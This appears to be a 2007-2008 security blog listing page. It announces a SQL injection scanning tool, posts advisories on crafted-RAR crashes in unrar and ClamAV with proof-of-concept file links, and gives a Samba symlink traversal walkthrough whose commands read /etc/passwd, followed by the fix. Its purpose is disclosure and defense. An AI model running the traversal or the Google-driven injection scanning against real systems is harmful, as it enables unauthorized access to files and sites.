SQL injection digger is a command line program that looks for SQL injections and
common errors in web sites. Current version can perform the following operations:

* Look for SQL injections and common errors in web site URLs found by performing
a google search.
* Look for SQL injections and common errors in a given URL or a file with URLs.
* Look for SQL injections and common errors in links from a web page.
* Crawl a web site/web page and do the above.

Also supports

* Load multiple triggers from file.
* Load multiple signature databases from files.
* HTTPS support.
* HTTP proxy support with authentication.
* Basic authentication.
* Specify user agent.
* Specify referer.
* HTTP Cookies loading from command line or a file.

Find out more at http://sqid.rubyforge.org.

| posted in projects by msg on January 14th, 2008 at 6:25 am | permanent link |

Vendor: RARLABS (http://www.rarlabs.com)

Product: Unrar for linux (freeware).

Versions affected: All upto 3.70 beta 4

Severity: Moderate

Issue

The unrar for Linux results in crash due to processing of standard filters in RAR VM, while
processing a special crafted compressed RAR file. This happens only while extracting the
contents from the compressed file.

Impact

Any programs/softwares using the code from unrar for Linux from rarlabs for processing RAR files
are vulnerable.

PoC

http://www.metaeye.org/codes/corrupted.rar
The corrupted file has only one byte change from the original. At offset 0xE9, 80—>81.

References

1. Bugtraq BID 24866.

Status

Reported: 20/06/2007
Fixed in version 3.7 beta 5.

| posted in advisories by msg on July 11th, 2007 at 4:09 pm | permanent link |

Vendor: Clam AntiVirus (http://www.clamav.net)

Product: Clamav (libclamav)

Versions Affected: All before 0.91

Severity: Moderate

Issue

Clamav crashes due to processing of standard filters in RAR VM, while processing a
corrupted RAR file. Processing the corrupted file results in a null pointer deference.

Impact

Processing the corrupted file will result in crashing of clamscan application and
clamd daemon.

Fix

Upgrade to version 0.91.

PoC

http://www.metaeye.org/codes/corrupted.rar

Vendor Status

Reported: 25/06/2007
Fixed: 11/07/2007

References

1. Clamav bugzilla bug id 555.
2. Secunia advisory SA26038.
3. Bugtraq ID 24866.
4. CVE-2007-3725.

| posted in advisories by msg on July 11th, 2007 at 8:04 am | permanent link |

Noticed a security issue with default samba configurations shipped with most Linux distros.

For example lets say we have a system A with a writable share XYZ. On an other system B,
we mount the share and create a link to /, i.e to the root directory.

[root@B] smbmount //A/XYZ /mnt/share -o username=test
Password:
[root@B] ln -s / /mnt/share/ROOT

Now using the smbclient tool to access the share

[root@B] smbclient -U test //A/XYZ
Password:
Domain=[A] OS=[Unix] Server=[Samba 3.0.26a]
smb: \> ls ROOT/etc/passwd
passwd 879 Tue Sep 4 16:11:56 2007
37760 blocks of size 1048576. 9355 blocks available
smb: \>

As you can see the whole file system is now accessible, the attacker can download all
accessible files across the file system on A.

To make sure this does not happen add the following directive to smb.conf in
[global] section.

wide links=no

| posted in hunch by warl0ck on June 21st, 2007 at 3:20 pm | permanent link |

The %00 is the famous null character when encoded in a URL. It is interesting to see how
different web servers behave when a null character is there in the GET request.

I use a simple python program that accepts the website name and URL to get, responds with the
web server version if available in the header and HTTP response code.

% ./uget.py
usage: ./uget.py <website name> <url>

continued…

| posted in hunch by warl0ck on May 17th, 2007 at 4:27 am | permanent link |